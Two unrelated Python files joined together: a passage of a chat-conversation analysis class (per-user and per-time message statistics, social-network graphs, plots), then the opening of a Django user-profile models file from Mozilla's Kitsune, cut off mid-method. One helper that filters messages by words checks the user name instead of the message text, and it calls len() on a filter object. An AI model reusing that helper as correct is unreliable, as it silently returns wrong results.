'YYYY-MM' representing a month between the month of the first
message and the month of the last message to the sum of the
values of message_statistic over all messages in self.messages
from that month.
"""
start_dt = self.messages[0].timestamp
end_dt = self.messages[-1].timestamp
start_date_month_start = datetime(start_dt.year, start_dt.month, 1)
end_date_month_start = datetime(end_dt.year, end_dt.month, 1)
dt_month_range = rrule(MONTHLY, dtstart=start_date_month_start,
until=end_date_month_start)
month_range = [dt.date() for dt in dt_month_range]
month_to_message_statistic = {dt.strftime(self.MONTH_FORMAT): 0 for dt in month_range}
for message in self.messages:
month_str = message.timestamp.strftime(self.MONTH_FORMAT)
month_to_message_statistic[month_str] += message_statistic(message)
return month_to_message_statistic
def get_year_to_message_statistic(self, message_statistic):
"""
Maps each year between the year of the first message and the year of
the last message, inclusive, to the sum of the values of a message
statistic over all messages from that year.
Args:
message_statistic: A function mapping a Message object to an int or
a float.
Returns:
year_to_message_statistic: A dict mapping an int representing a
year between the year of the first message and the year of the
last message to the sum of the values of message_statistic over
all messages in self.messages from that year.
"""
start_year = self.messages[0].timestamp.year
end_year = self.messages[-1].timestamp.year
year_to_message_statistic = {year: 0 for year in range(start_year, end_year + 1)}
for message in self.messages:
year_to_message_statistic[message.timestamp.year] += message_statistic(message)
return year_to_message_statistic
def get_time_interval_to_message_statistic(self, time_interval,
message_statistic):
"""
Maps each value of time interval to the sum of the values of a message
statistic over all messages from that time interval value. Wrapper
function for the functions 'get_' + time_interval.replace(' ', '_') +
'_to_message_statistic'.
Args:
time_interval: One of 'minute in hour', 'minute in day', 'hour',
'date', 'week', 'month', 'year'.
message_statistic: A function mapping a Message object to an int or
a float.
Returns:
time_interval_to_message_statistic: A dict mapping each value of a
time interval to the sum of the values of message_statistic
over all messages in self.messages from that time interval
value.
"""
if time_interval not in self.TIME_INTERVALS:
raise ValueError('time_interval must be in {}'.format(self.TIME_INTERVALS))
getter = getattr(self, 'get_' + time_interval.replace(' ', '_') + '_to_message_statistic')
time_interval_to_message_statistic = getter(message_statistic)
return time_interval_to_message_statistic
def get_time_interval_to_n_messages(self, time_interval):
if time_interval not in self.TIME_INTERVALS:
raise ValueError('time_interval must be in {}'.format(self.TIME_INTERVALS))
message_statistic = lambda x: 1
return self.get_time_interval_to_message_statistic(time_interval, message_statistic)
def get_time_interval_to_word_count(self, time_interval, word):
if time_interval not in self.TIME_INTERVALS:
raise ValueError('time_interval must be in {}'.format(self.TIME_INTERVALS))
if ' ' in word:
raise ValueError('word cannot contain spaces')
message_statistic = lambda x: self.word_count(x, word)
return self.get_time_interval_to_message_statistic(time_interval, message_statistic)
def get_user_to_messages(self):
user_to_messages = {}
for message in self.messages:
user = message.user
if user not in user_to_messages:
user_to_messages[user] = [message]
else:
user_to_messages[user].append(message)
return user_to_messages
def get_user_to_text(self):
"""
Maps a user to a string containing each of the user's message texts
separated by a newline.
"""
user_to_messages = self.get_user_to_messages()
user_to_text = {}
for user in user_to_messages:
message_texts = [m.text for m in user_to_messages[user]]
user_to_text[user] = '\n'.join(message_texts)
return user_to_text
@staticmethod
def word_count(message, word):
"""
Computes the number of times a word appears in a message
(case-insensitive).
Args:
message: A Message object.
word: A string with no spaces.
Returns:
An int representing the number of times word (case-insensitive)
appears in the text of message split by spaces.
"""
if ' ' in word:
raise ValueError('word cannot contain spaces')
lowercase_tokens = [token.lower() for token in nltk.word_tokenize(message.text)]
return lowercase_tokens.count(word.lower())
def minute_difference(self, dt1, dt2):
"""
Computes the difference between two datetimes in minutes.
Args:
dt1: A datetime such that dt1 >= dt2.
dt2: A datetime such that dt1 >= dt2.
Returns:
A float representing the number of minutes between dt2 and dt1.
"""
if dt1 < dt2:
raise ValueError('Must have dt1 >= dt2')
difference = dt1 - dt2
return self.HOURS_PER_DAY*self.MINUTES_PER_HOUR*difference.days + difference.seconds / float(self.SECONDS_PER_MINUTE)
def exp_damped_minute_difference(self, dt1, dt2, alpha):
"""
Computes exp(-alpha * t), where t is the difference between two
datetimes in minutes.
Args:
dt1: A datetime such that dt1 >= dt2.
dt2: A datetime such that dt1 >= dt2.
alpha: A nonnegative float representing the damping factor.
Returns:
A float equal to exp(-alpha * t), where t is the difference between
two datetimes in minutes.
"""
if dt1 < dt2:
raise ValueError('Must have dt1 >= dt2')
if alpha < 0:
raise ValueError('Must have alpha >= 0')
t = self.minute_difference(dt1, dt2)
return math.exp(-alpha * t)
def exp_damped_day_difference(self, dt1, dt2, alpha):
"""
Computes exp(-alpha * t), where t is the difference between two
datetimes in days.
Args:
dt1: A datetime such that dt1 >= dt2.
dt2: A datetime such that dt1 >= dt2.
alpha: A nonnegative float representing the damping factor.
Returns:
A float equal to exp(-alpha * t), where t is the difference between
two datetimes in days.
"""
if dt1 < dt2:
raise ValueError('Must have dt1 >= dt2')
if alpha < 0:
raise ValueError('Must have alpha >= 0')
minute_diff = self.minute_difference(dt1, dt2)
day_diff = float(minute_diff) / (self.HOURS_PER_DAY * self.MINUTES_PER_HOUR)
return math.exp(-alpha * day_diff)
def get_user_to_initiated_messages(self, minute_cutoff):
"""
Creates a list of initiated messages for each user.
Args:
minute_cutoff: A nonnegative int representing the minimum number
of minutes between consecutive messages for the second message
to be considered an initiated message.
Returns:
user_to_initiated_messages: A dict mapping each user in
self.users_union to a list of messages initiated by that user.
We consider a message to be initiated if it is the first
message of the conversation or if at least minute_cutoff
minutes have passed since the previous message.
"""
if minute_cutoff < 0:
raise ValueError('minute_cutoff must be a nonnegative int')
user_to_initiated_messages = {user: [] for user in self.users_union}
for (i, message) in enumerate(self.messages):
# First message in conversation is initiated
if i == 0:
user_to_initiated_messages[message.user].append(message)
# See if at least minute_cutoff minutes have passed since the last message
elif self.minute_difference(message.timestamp, self.messages[i-1].timestamp) >= minute_cutoff:
user_to_initiated_messages[message.user].append(message)
return user_to_initiated_messages
def get_user_to_n_initiated_messages(self, minute_cutoff):
user_to_initiated_messages = self.get_user_to_initiated_messages(minute_cutoff)
return {user: len(user_to_initiated_messages[user]) for user in user_to_initiated_messages}
def get_user_to_proportion_initiated(self, cutoff_min, cutoff_max):
"""
Maps each user to a list of proportions of messages initiated by that
user for cutoff_min <= minute_cutoff <= cutoff_max.
Args:
cutoff_min: A nonnegative int representing the minimum
minute_cutoff. Must satisfy cutoff_min <= cutoff_max.
cutoff_max: A nonnegative int representing the maximum
minute_cutoff. Must satisfy cutoff_min <= cutoff_max.
Returns:
x: A list of ints between cutoff_min and cutoff_max, inclusive.
user_to_proportion_initiated: A dict that maps each user in
self.users_union to a list proportion_initiated such that
proportion_initiated[i] is the proportion of messages initiated
by user with minute_cutoff = x[i].
"""
if cutoff_min < 0:
raise ValueError('cutoff_min must be a nonnegative int')
if cutoff_max < 0:
raise ValueError('cutoff_max must be a nonnegative int')
if cutoff_min > cutoff_max:
raise ValueError('cutoff_min must be less than or equal to cutoff_max')
x = range(cutoff_min, cutoff_max + 1)
user_to_proportion_initiated = {}
for minute_cutoff in x:
user_to_n_initiated_messages = self.get_user_to_n_initiated_messages(minute_cutoff)
# always positive because first message is initiated message
total_n_initiated = sum(user_to_n_initiated_messages.values())
for user in user_to_n_initiated_messages:
prop = user_to_n_initiated_messages[user] / float(total_n_initiated)
if user not in user_to_proportion_initiated:
user_to_proportion_initiated[user] = [prop]
else:
user_to_proportion_initiated[user].append(prop)
return (x, user_to_proportion_initiated)
def get_user_to_end_messages(self, minute_cutoff):
"""
Creates a list of end messages for each user.
Args:
minute_cutoff: A nonnegative int representing the minimum number of
minutes between consecutive messages for the first message to
be considered an end message.
Returns:
user_to_end_messages: A dict mapping each user in self.users_union
to a list of end messages by that user. We call a message an
end message if it is the last message of the conversation or if
at least minute_cutoff minutes passed before the next message.
"""
if minute_cutoff < 0:
raise ValueError('minute_cutoff must be a nonnegative int')
user_to_end_messages = {user: [] for user in self.users_union}
for (i, message) in enumerate(self.messages):
# Last message in conversation is an end message
if i == len(self.messages) - 1:
user_to_end_messages[message.user].append(message)
# See if at least minute_cutoff minutes pass before the next message
elif self.minute_difference(self.messages[i+1].timestamp, message.timestamp) >= minute_cutoff:
user_to_end_messages[message.user].append(message)
return user_to_end_messages
def get_user_to_n_end_messages(self, minute_cutoff):
user_to_end_messages = self.get_user_to_end_messages(minute_cutoff)
return {user: len(user_to_end_messages[user]) for user in user_to_end_messages}
def get_user_to_proportion_end(self, cutoff_min, cutoff_max):
"""
Maps each user to a list of proportions of messages ended by that user
for cutoff_min <= minute_cutoff <= cutoff_max.
Args:
cutoff_min: A nonnegative int representing the minimum
minute_cutoff. Must satisfy cutoff_min <= cutoff_max.
cutoff_max: A nonnegative int representing the maximum
minute_cutoff. Must satisfy cutoff_min <= cutoff_max.
Returns:
x: A list of ints between cutoff_min and cutoff_max, inclusive.
user_to_proportion_end: A dict that maps each user in
self.users_union to a list proportion_end such that
proportion_end[i] is the proportion of messages ended by user
with minute_cutoff = x[i].
"""
if cutoff_min < 0:
raise ValueError('cutoff_min must be a nonnegative int')
if cutoff_max < 0:
raise ValueError('cutoff_max must be a nonnegative int')
if cutoff_min > cutoff_max:
raise ValueError('cutoff_min must be less than or equal to cutoff_max')
x = range(cutoff_min, cutoff_max + 1)
user_to_proportion_end = {}
for minute_cutoff in x:
user_to_n_end_messages = self.get_user_to_n_end_messages(minute_cutoff)
# always positive because last message is initiated message
total_n_end = sum(user_to_n_end_messages.values())
for user in user_to_n_end_messages:
prop = user_to_n_end_messages[user] / float(total_n_end)
if user not in user_to_proportion_end:
user_to_proportion_end[user] = [prop]
else:
user_to_proportion_end[user].append(prop)
return (x, user_to_proportion_end)
# Returns the messages containing at least one word in words by user user
# words - list of words
def messages_containing_words_by_user(self, words, user):
return filter(lambda x: x.user == user and not set(x.user).isdisjoint(words), self.messages)
def n_messages_containing_words_by_user(self, words, user):
return len(self.messages_containing_words_by_user(words, user))
def get_user_to_message_statistic(self, message_statistic):
"""
Maps each user in self.users_union to the sum of the values of
message_statistic over all messages by that user.
Args:
message_statistic: A function mapping a Message object to an int or
a float.
Returns:
user_to_message_statistic: A dict mapping each user in
self.users_union to the sum of the values of message_statistic
over all messages in self.messages sent by that user.
"""
user_to_message_statistic = {user: 0 for user in self.users_union}
for message in self.messages:
user_to_message_statistic[message.user] += message_statistic(message)
return user_to_message_statistic
def get_user_to_n_messages(self):
return self.get_user_to_message_statistic(lambda x: 1)
def get_user_to_damped_n_messages(self, dt_max, alpha):
"""
Maps each user to the number of messages before a reference datetime,
where each message count is exponentially damped by a constant times
the difference between the reference datetime and the datetime of the
message.
Args:
dt_max: A datetime representing the max datetime of messages
to consider.
alpha: A nonnegative float representing the damping factor.
Returns:
user_to_damped_n_messages: A dict mapping each user in
self.users_union to the damped number of messages by that user
before dt_max. The contribution of a message is a float equal
to exp(-alpha * t), where t is the difference in days between
dt_max and the datetime of the message.
"""
if alpha < 0:
raise ValueError('Must have alpha >= 0')
try:
# Only keep messages with datetimes <= dt_max
filtered = self.filter_by_datetime(end_dt=dt_max)
except EmptyConversationError:
# Map all users to 0 if dt_max occurs before all messages
return self.get_user_to_message_statistic(lambda x: 0)
damped_message_count = lambda x: self.exp_damped_day_difference(dt_max, x.timestamp, alpha)
user_to_damped_n_messages = filtered.get_user_to_message_statistic(damped_message_count)
return user_to_damped_n_messages
def get_user_to_word_count(self, word):
"""
Maps each user to the number of times they say a word
(case-insensitive).
Args:
word: A string with no spaces.
Returns:
user_to_word_count: A dict mapping each user in self.users_union to
the number of times word (case-insensitive) appears in messages
by the user, where we split each message into tokens using
spaces.
"""
if ' ' in word:
raise ValueError('word cannot contain spaces')
message_statistic = lambda x: self.word_count(x, word)
user_to_word_count = self.get_user_to_message_statistic(message_statistic)
return user_to_word_count
def sum_conversation_message_statistic(self, message_statistic):
"""
Sums a message statistic over all messages.
Args:
message_statistic: A function mapping a Message object to an int or
a float.
Returns:
A float equal to the sum of the values of message_statistic over
all messages in self.messages.
"""
return sum(message_statistic(message) for message in self.messages)
def damped_n_messages(self, dt_max, alpha):
"""
Computes the sum of damped message counts before a reference datetime,
where each damped message count is exponentially damped by a constant
times the difference between the reference datetime and the datetime of
the message.
Args:
dt_max: A datetime representing the max datetime of messages to
consider.
alpha: A nonnegative float representing the damping factor.
Returns:
damped_n_messages_total: A float equal to the sum of damped message
counts before dt_max. The contribution of a message is
exp(-alpha * t), where t is the difference in days between
dt_max and the datetime of the message.
"""
if alpha < 0:
raise ValueError('Must have alpha >= 0')
try:
# Only keep messages with datetimes <= dt_max
filtered = self.filter_by_datetime(end_dt=dt_max)
except EmptyConversationError:
# dt_max occurs before all messages
return 0
damped_message_count = lambda x: self.exp_damped_day_difference(dt_max, x.timestamp, alpha)
damped_n_messages_total = filtered.sum_conversation_message_statistic(damped_message_count)
return damped_n_messages_total
def get_alpha_to_damped_n_messages(self, dt_max, alpha_min, alpha_max, n_alphas):
if alpha_min < 0:
raise ValueError('Must have alpha_min >= 0')
if alpha_min > alpha_max:
raise ValueError('Must have alpha_min <= alpha_max')
if n_alphas <= 1:
raise ValueError('Must have n_alphas >= 2')
alpha_to_damped_n_messages = {}
for k in range(n_alphas):
# Linearly interpolate alphas
t = k/float(n_alphas - 1)
alpha = (1 - t)*alpha_min + t*alpha_max
alpha_to_damped_n_messages[alpha] = self.damped_n_messages(dt_max, alpha)
return alpha_to_damped_n_messages
"""
Distributions
"""
def get_message_statistic_distribution(self, message_statistic):
"""
Computes the distribution of a message function over all messages.
Args:
message_statistic: A function mapping a Message object to an int or
a float.
Returns:
A list of floats equal to the values of message_statistic applied
to each message in self.messages.
"""
return [message_statistic(message) for message in self.messages]
def get_message_length_distribution(self):
"""
Computes the distribution of messages lengths (number of characters).
Returns:
A list of ints equal to the lengths of the texts of the messages in
self.messages.
"""
message_statistic = lambda x: len(x.text)
return self.get_message_statistic_distribution(message_statistic)
def get_message_statistic_in_time_interval(self, time_interval, message_statistic):
"""
Returns the values of get_time_interval_to_message_statistic() sorted
by key.
"""
time_interval_to_message_statistic = self.get_time_interval_to_message_statistic(time_interval, message_statistic)
return [time_interval_to_message_statistic[t] for t in sorted(time_interval_to_message_statistic.keys())]
def get_n_messages_in_time_interval(self, time_interval):
return self.get_message_statistic_in_time_interval(time_interval, lambda x: 1)
def n_messages_chi_square(self, time_interval):
"""
Computes a chi square test against the null hypothesis that the number
of messages is uniformly distributed across the time interval. Only
makes sense for the time intervals 'minute in hour', 'minute in day',
'hour' since those ones have a fixed number of values.
Args:
time_interval: One of 'minute in hour', 'minute in day', 'hour'.
Returns:
chisq: A float representing the chi square statistic where the
observations consist of the number of messages in each value of
time_interval and the null hypothesis is that the number of
messages is uniformly distributed.
p: A float representing the p-value of the chi square test.
"""
valid_time_intervals = ['minute in hour', 'minute in day', 'hour']
if time_interval not in valid_time_intervals:
raise ValueError('time_interval must be in {}'.format(valid_time_intervals))
result = chisquare(self.get_n_messages_in_time_interval(time_interval))
return (result.statistic, result.pvalue)
"""
Directed graphs representing the conversation as different types of social networks
"""
def directed_graph_minute_cutoff(self, minute_cutoff, self_loops=False):
"""
Creates a weighted directed graph representing the conversation as a
social network. The weight of edge (u1, u2) is the number of times user
u1 responds to u2 in the conversation. We say that u1 responds to u2
when there exist two consecutive messages m2, m1 by u2, u1 such that
the number of minutes between m2 and m1 is at most a fixed cutoff
value.
Args:
minute_cutoff: A nonnegative int representing the maximum number of
minutes between two messages for the second message to be
considered a response to the first message.
self_loops: A boolean representing whether or not to include edges
that connect a vertex to itself.
Returns:
G: A DiGraph object whose vertex set is self.users_union. The
weight of edge (u1, u2) is the number of times u1 responds to
u2. We say that u1 responds to u2 when there exist two
consecutive messages m2, m1 by u2, u1 such that the number of
minutes between m2 and m1 is at most minute_cutoff. If u1 never
responds to u2, then (u1, u2) is not an edge.
"""
if minute_cutoff < 0:
raise ValueError('minute_cutoff must be a nonnegative int')
G = nx.DiGraph()
G.add_nodes_from(self.users_union)
for (i, message) in enumerate(self.messages):
# Consider consecutive message pairs
if i > 0:
last_message = self.messages[i-1]
if self.minute_difference(message.timestamp, last_message.timestamp) <= minute_cutoff:
user1 = message.user
user2 = last_message.user
if user2 not in G[user1]:
G.add_edge(user1, user2, weight=1)
else:
G[user1][user2]['weight'] += 1
# Remove self-loops if necessary
if not self_loops:
G.remove_edges_from(G.selfloop_edges())
return G
# TODO: visualize conversation intensity, set max number of nodes, remove self-loops
def directed_graph_name_mentions(self, self_loops=False):
"""
Creates a weighted directed graph representing the conversation as a
social network. The weight of edge (u1, u2) is the number of times user
u1 says the first name of user u2. To avoid ambiguity, we require that
all users in self.users_union have distinct first names
(case-insensitive).
Args:
self_loops: A boolean representing whether or not to include edges
that connect a vertex to itself.
Returns:
G: A DiGraph object whose vertex set is self.users_union. The
weight of edge (u1. u2) is the number of times u1 says the
first name of u2. We are case-insensitive, so if u2's name is
'Simon Zheng' and u1 says 'simon', then this counts. In
addition, we count instances of the name preceded by a '@', so
'@simon' would count in the previous example. If u1 never
mentions u2's name, then (u1, u2) is not an edge.
"""
user_to_first_name = {user: user.split(' ')[0].lower()
for user in self.users_union}
if len(set(user_to_first_name.values())) != len(self.users_union):
raise ValueError('The first names in self.users_union must be distinct')
G = nx.DiGraph()
G.add_nodes_from(self.users_union)
for message in self.messages:
user1 = message.user
for user2 in self.users_union:
name_count = self.word_count(message, user_to_first_name[user2])
# Include hashtag name mentions
name_count += self.word_count(message, '@' + user_to_first_name[user2])
if name_count > 0:
if user2 not in G[user1]:
G.add_edge(user1, user2, weight=name_count)
else:
G[user1][user2]['weight'] += name_count
# Remove self-loops if necessary
if not self_loops:
G.remove_edges_from(G.selfloop_edges())
return G
# plot centrality measures as bar charts
def get_user_to_eigenvector_centrality(self, G):
return nx.eigenvector_centrality(G)
"""
Plots
"""
def plot_message_statistic_by_time(self,
time_interval_to_message_statistic,
time_interval, y_label,
bar_chart=True):
"""
Plots the sum ,of the values of a message statistic from messages in a
time interval against the time interval. Plots a bar chart or a line
graph. We suggest using a line graph when the number of values of the
time interval is large, such as when the time interval is 'minute in
day' or 'date'.
Args:
time_interval_to_message_statistic: A dict mapping each value of a
time interval to the sum of the values of a message statistic
over all messages in self.messages from that time interval
value.
time_interval: One of 'minute in hour', 'minute in day', 'hour',
'date', 'week', 'month', 'year'.
y_label: A string representing the label for the y-axis.
bar_chart: A boolean that is True if you want to plot a bar chart
and False if you want to plot a line graph.
"""
if time_interval not in self.TIME_INTERVALS:
raise ValueError('time_interval must be in {}'.format(self.TIME_INTERVALS))
# Create title and labels
if time_interval == 'minute in hour':
x_label = 'Minute in Hour'
elif time_interval == 'minute in day':
x_label = 'Minute in Day'
else:
x_label = time_interval.capitalize()
title = y_label + ' by ' + x_label
# Plot bar chart
if bar_chart:
plot.plot_bar_chart(time_interval_to_message_statistic, title,
x_label, y_label)
# Plot line graph
else:
# Convert times to datetimes because matplotlib can't plot times
# along the x-axis but can plot datetimes along the x-axis
if time_interval == 'minute in day':
dt_to_message_statistic = {}
for t in time_interval_to_message_statistic:
arbitrary_date = date(2000, 1, 1)
dt = datetime.combine(arbitrary_date, t)
dt_to_message_statistic[dt] = time_interval_to_message_statistic[t]
time_interval_to_message_statistic = dt_to_message_statistic
# Convert month strings to datetimes because matplotlib can't plot
# strings along the x-axis but can plot datetimes along the x-axis
elif time_interval == 'month':
dt_to_message_statistic = {}
for month_str in time_interval_to_message_statistic:
dt = datetime.strptime(month_str, self.MONTH_FORMAT)
dt_to_message_statistic[dt] = time_interval_to_message_statistic[month_str]
time_interval_to_message_statistic = dt_to_message_statistic
plot.plot_line_graph(time_interval_to_message_statistic, title, x_label, y_label)
def plot_n_messages_by_time(self, time_interval, bar_chart=True):
time_interval_to_n_messages = self.get_time_interval_to_n_messages(time_interval)
y_label = 'Number of Messages'
self.plot_message_statistic_by_time(time_interval_to_n_messages,
time_interval, y_label,
bar_chart=bar_chart)
def plot_word_count_by_time(self, time_interval, word, bar_chart=True):
time_interval_to_word_count = self.get_time_interval_to_word_count(time_interval, word)
y_label = 'Count of the Word \'{}\''.format(word)
self.plot_message_statistic_by_time(time_interval_to_word_count,
time_interval, y_label,
bar_chart=bar_chart)
def plot_message_statistic_by_user(self, user_to_message_statistic, y_label):
x_label = 'User'
title = y_label + ' by ' + x_label
plot.plot_bar_chart(user_to_message_statistic, title, x_label, y_label)
def plot_n_messages_by_user(self):
user_to_n_messages = self.get_user_to_n_messages()
y_label = 'Number of Messages'
self.plot_message_statistic_by_user(user_to_n_messages, y_label)
def plot_damped_n_messages_by_user(self, dt_max, alpha):
user_to_damped_n_messages = self.get_user_to_damped_n_messages(dt_max, alpha)
y_label = 'Damped Number of Messages (alpha = {})'.format(alpha)
self.plot_message_statistic_by_user(user_to_damped_n_messages, y_label)
def plot_word_count_by_user(self, word):
user_to_word_count = self.get_user_to_word_count(word)
y_label = 'Count of the Word \'{}\''.format(word)
self.plot_message_statistic_by_user(user_to_word_count, y_label)
def plot_initiated_messages_by_user(self, minute_cutoff):
user_to_n_initiated_messages = self.get_user_to_n_initiated_messages(minute_cutoff)
title = 'Number of Initiated Messages by User with minute_cutoff = {}'.format(minute_cutoff)
x_label = 'User'
y_label = 'Number of Initiated Messages'
plot.plot_bar_chart(user_to_n_initiated_messages, title, x_label, y_label)
def plot_end_messages_by_user(self, minute_cutoff):
user_to_n_end_messages = self.get_user_to_n_end_messages(minute_cutoff)
title = 'Number of End Messages by User with minute_cutoff = {}'.format(minute_cutoff)
x_label = 'User'
y_label = 'Number of End Messages'
plot.plot_bar_chart(user_to_n_end_messages, title, x_label, y_label)
def plot_proportion_initiated_by_minute_cutoff(self, cutoff_min, cutoff_max):
(x, user_to_proportion_initiated) = self.get_user_to_proportion_initiated(cutoff_min, cutoff_max)
title = 'Proportion of Initiated Messages by minute_cutoff'
x_label = 'minute_cutoff'
y_label = 'Proportion of Initiated Messages'
plot.plot_line_graph_multiple_lines(x, user_to_proportion_initiated, title, x_label, y_label)
def plot_proportion_end_by_minute_cutoff(self, cutoff_min, cutoff_max):
(x, user_to_proportion_end) = self.get_user_to_proportion_end(cutoff_min, cutoff_max)
title = 'Proportion of End Messages by minute_cutoff'
x_label = 'minute_cutoff'
y_label = 'Proportion of End Messages'
plot.plot_line_graph_multiple_lines(x, user_to_proportion_end, title, x_label, y_label)
def plot_damped_n_messages_by_alpha(self, dt_max, alpha_min, alpha_max, n_alphas=100):
"""
looks like exponential decay because dominated by most recent message
"""
alpha_to_damped_n_messages = self.get_alpha_to_damped_n_messages(dt_max, alpha_min, alpha_max, n_alphas)
y_label = 'Damped Number of Messages'
x_label = 'Alpha'
title = y_label + ' by ' + x_label
plot.plot_line_graph(alpha_to_damped_n_messages, title, x_label, y_label)
def plot_eigenvector_centrality_by_user(self, G):
user_to_eigenvector_centrality = self.get_user_to_eigenvector_centrality(G)
y_label = 'Eigenvector Centrality'
self.plot_message_statistic_by_user(user_to_eigenvector_centrality, y_label)
if __name__ == '__main__':
from message import Message
messages = []
messages.append(Message('Alice', datetime(2013, 11, 20, 1, 1), 'text1'))
messages.append(Message('Alice', datetime(2015, 1, 20, 1, 1), 'text2'))
messages.append(Message('Bob', datetime(2015, 1, 20, 1, 10), 'text3 a'))
messages.append(Message('Bob', datetime(2015, 1, 20, 1, 10), 'text4 a Joe a'))
messages.append(Message('Alice', datetime(2015, 1, 21, 3, 59), 'text5 @joE'))
messages.append(Message('Bob', datetime(2015, 1, 21, 4, 2), 'text6 a'))
messages.append(Message('Joe', datetime(2015, 2, 24, 0, 2), 'atext7 a @Bobbob @Bob boB'))
c = Conversation(messages, ['Alice', 'Bob', 'Charles'])
d1 = c.get_user_to_n_messages()
# print d1 == d2
# print d1
# print d2
# c.plot_proportion_initiated_by_minute_cutoff(0, 30)
a = datetime(2017, 1, 1, 1, 1)
b = datetime(2017, 1, 2, 1, 1)
dt_max = datetime(2015, 1, 28, 23, 59)
# c.plot_n_messages_by_time('minute in day', bar_chart=False)
# m = c.get_time_interval_to_n_messages('minute in day')
# for k in sorted(m.keys()):
# print k, m[k]
| |
import hashlib
import logging
import random
import re
import time
from datetime import datetime, timedelta
from django.conf import settings
from django.contrib.auth.models import User, Group
from django.contrib.sites.models import Site
from django.db import models
from celery.task import task
from statsd import statsd
from timezones.fields import TimeZoneField
from tower import ugettext as _
from tower import ugettext_lazy as _lazy
from kitsune.lib.countries import COUNTRIES
from kitsune.search.es_utils import UnindexMeBro
from kitsune.search.models import (
SearchMappingType, SearchMixin, register_for_indexing,
register_mapping_type)
from kitsune.sumo import email_utils
from kitsune.sumo.models import ModelBase, LocaleField
from kitsune.sumo.urlresolvers import reverse
from kitsune.sumo.utils import auto_delete_files, chunked
from kitsune.users.validators import TwitterValidator
log = logging.getLogger('k.users')
SHA1_RE = re.compile('^[a-f0-9]{40}$')
CONTRIBUTOR_GROUP = 'Registered as contributor'
@auto_delete_files
class Profile(ModelBase, SearchMixin):
"""Profile model for django users."""
user = models.OneToOneField(User, primary_key=True,
verbose_name=_lazy(u'User'))
name = models.CharField(max_length=255, null=True, blank=True,
verbose_name=_lazy(u'Display name'))
public_email = models.BooleanField( # show/hide email
default=False, verbose_name=_lazy(u'Make my email public'))
avatar = models.ImageField(upload_to=settings.USER_AVATAR_PATH, null=True,
blank=True, verbose_name=_lazy(u'Avatar'),
max_length=settings.MAX_FILEPATH_LENGTH)
bio = models.TextField(null=True, blank=True,
verbose_name=_lazy(u'Biography'))
website = models.URLField(max_length=255, null=True, blank=True,
verbose_name=_lazy(u'Website'))
twitter = models.CharField(max_length=15, null=True, blank=True, validators=[TwitterValidator],
verbose_name=_lazy(u'Twitter Username'))
facebook = models.URLField(max_length=255, null=True, blank=True,
verbose_name=_lazy(u'Facebook URL'))
mozillians = models.CharField(max_length=255, null=True, blank=True,
verbose_name=_lazy(u'Mozillians Username'))
irc_handle = models.CharField(max_length=255, null=True, blank=True,
verbose_name=_lazy(u'IRC nickname'))
timezone = TimeZoneField(null=True, blank=True,
verbose_name=_lazy(u'Timezone'))
country = models.CharField(max_length=2, choices=COUNTRIES, null=True,
blank=True, verbose_name=_lazy(u'Country'))
# No city validation
city = models.CharField(max_length=255, null=True, blank=True,
verbose_name=_lazy(u'City'))
locale = LocaleField(default=settings.LANGUAGE_CODE,
verbose_name=_lazy(u'Preferred language'))
first_answer_email_sent = models.BooleanField(
default=False, help_text=_lazy(u'Has been sent a first answer contribution email.'))
first_l10n_email_sent = models.BooleanField(
default=False, help_text=_lazy(u'Has been sent a first revision contribution email.'))
involved_from = models.DateField(null=True, blank=True,
verbose_name=_lazy(u'Involved with Mozilla from'))
class Meta(object):
permissions = (('view_karma_points', 'Can view karma points'),
('deactivate_users', 'Can deactivate users'),
('screen_share', 'Can screen share'),)
def __unicode__(self):
try:
return unicode(self.user)
except Exception as exc:
return unicode('%d (%r)' % (self.pk, exc))
def get_absolute_url(self):
return reverse('users.profile', args=[self.user_id])
def clear(self):
"""Clears out the users profile"""
self.name = ''
self.public_email = False
self.avatar = None
self.bio = ''
self.website = ''
self.twitter = ''
self.facebook = ''
self.mozillians = ''
self.irc_handle = ''
self.city = ''
@property
def display_name(self):
return self.name if self.name else self.user.username
@property
def twitter_usernames(self):
from kitsune.customercare.models import Reply
return list(
Reply.objects.filter(user=self.user)
.values_list('twitter_username', flat=True)
.distinct())
@classmethod
def get_mapping_type(cls):
return UserMappingType
@classmethod
def get_serializer(cls, serializer_type='full'):
# Avoid circular import
from kitsune.users import api
if serializer_type == 'full':
return api.ProfileSerializer
elif serializer_type == 'fk':
return api.ProfileFKSerializer
else:
raise ValueError('Unknown serializer type "{}".'.format(serializer_type))
@property
def last_contribution_date(self):
"""Get the date of the user's last contribution."""
from kitsune.customercare.models import Reply
from kitsune.questions.models import Answer
from kitsune.wiki.models import Revision
dates = []
# Latest Army of Awesome reply:
try:
aoa_reply = Reply.objects.filter(
user=self.user).latest('created')
dates.append(aoa_reply.created)
except Reply.DoesNotExist:
pass
# Latest Support Forum answer:
try:
answer = Answer.objects.filter(
creator=self.user).latest('created')
dates.append(answer.created)
except Answer.DoesNotExist:
pass
# Latest KB Revision edited:
try:
revision = Revision.objects.filter(
creator=self.user).latest('created')
dates.append(revision.created)
except Revision.DoesNotExist:
pass
# Latest KB Revision reviewed:
try:
revision = Revision.objects.filter(
reviewer=self.user).latest('reviewed')
# Old revisions don't have the reviewed date.
dates.append(revision.reviewed or revision.created)
except Revision.DoesNotExist:
pass
if len(dates) == 0:
return None
return max(dates)
@property
def settings(self):
return self.user.settings
@property
def answer_helpfulness(self):
# Avoid circular import
from kitsune.questions.models import AnswerVote
return AnswerVote.objects.filter(answer__creator=self.user, helpful=True).count()
@register_mapping_type
class UserMappingType(SearchMappingType):
list_keys = [
'twitter_usernames',
'itwitter_usernames',
]
@classmethod
def get_model(cls):
return Profile
@classmethod
def get_index_group(cls):
return 'non-critical'
@classmethod
def get_mapping(cls):
return {
'properties': {
'id': {'type': 'long'},
'model': {'type': 'string', 'index': 'not_analyzed'},
'url': {'type': 'string', 'index': 'not_analyzed'},
'indexed_on': {'type': 'integer'},
'username': {'type': 'string', 'index': 'not_analyzed'},
'display_name': {'type': 'string', 'index': 'not_analyzed'},
'twitter_usernames': {
'type': 'string',
'index': 'not_analyzed'
},
'last_contribution_date': {'type': 'date'},
# lower-cased versions for querying:
'iusername': {'type': 'string', 'index': 'not_analyzed'},
'idisplay_name': {'type': 'string', 'analyzer': 'whitespace'},
'itwitter_usernames': {
'type': 'string',
'index': 'not_analyzed'
},
'avatar': {'type': 'string', 'index': 'not_analyzed'},
'suggest': {
'type': 'completion',
'index_analyzer': 'whitespace',
'search_analyzer': 'whitespace',
'payloads': True,
}
}
}
@classmethod
def extract_document(cls, obj_id, obj=None):
"""Extracts interesting thing from a Thread and its Posts"""
if obj is None:
model = cls.get_model()
